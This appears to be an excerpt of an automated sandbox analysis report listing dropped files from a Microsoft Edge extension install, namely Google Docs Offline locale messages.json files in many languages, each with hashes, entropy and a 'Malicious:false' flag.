Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ms\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):936
Entropy (8bit):4.457879437756106
Encrypted:false
SSDEEP:
MD5:7D273824B1E22426C033FF5D8D7162B7
SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\my\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3830
Entropy (8bit):3.5483353063347587
Encrypted:false
SSDEEP:
MD5:342335A22F1886B8BC92008597326B24
SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ne\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1898
Entropy (8bit):4.187050294267571
Encrypted:false
SSDEEP:
MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\nl\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):914
Entropy (8bit):4.513485418448461
Encrypted:false
SSDEEP:
MD5:32DF72F14BE59A9BC9777113A8B21DE6
SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\no\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):878
Entropy (8bit):4.4541485835627475
Encrypted:false
SSDEEP:
MD5:A1744B0F53CCF889955B95108367F9C8
SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\pa\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2766
Entropy (8bit):3.839730779948262
Encrypted:false
SSDEEP:
MD5:97F769F51B83D35C260D1F8CFD7990AF
SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\pl\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):978
Entropy (8bit):4.879137540019932
Encrypted:false
SSDEEP:
MD5:B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\pt_BR\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):907
Entropy (8bit):4.599411354657937
Encrypted:false
SSDEEP:
MD5:608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\pt_PT\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):914
Entropy (8bit):4.604761241355716
Encrypted:false
SSDEEP:
MD5:0963F2F3641A62A78B02825F6FA3941C
SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ro\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):937
Entropy (8bit):4.686555713975264
Encrypted:false
SSDEEP:
MD5:BED8332AB788098D276B448EC2B33351
SHA1:6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ru\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1337
Entropy (8bit):4.69531415794894
Encrypted:false
SSDEEP:
MD5:51D34FE303D0C90EE409A2397FCA437D
SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\si\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2846
Entropy (8bit):3.7416822879702547
Encrypted:false
SSDEEP:
MD5:B8A4FD612534A171A9A03C1984BB4BDD
SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\sk\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):934
Entropy (8bit):4.882122893545996
Encrypted:false
SSDEEP:
MD5:8E55817BF7A87052F11FE554A61C52D5
SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\sl\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):963
Entropy (8bit):4.6041913416245
Encrypted:false
SSDEEP:
MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\sr\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1320
Entropy (8bit):4.569671329405572
Encrypted:false
SSDEEP:
MD5:7F5F8933D2D078618496C67526A2B066
SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\sv\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):884
Entropy (8bit):4.627108704340797
Encrypted:false
SSDEEP:
MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\sw\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):980
Entropy (8bit):4.50673686618174
Encrypted:false
SSDEEP:
MD5:D0579209686889E079D87C23817EDDD5
SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ta\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1941
Entropy (8bit):4.132139619026436
Encrypted:false
SSDEEP:
MD5:DCC0D1725AEAEAAF1690EF8053529601
SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\te\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1969
Entropy (8bit):4.327258153043599
Encrypted:false
SSDEEP:
MD5:385E65EF723F1C4018EEE6E4E56BC03F
SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:false
Reputation:unknown
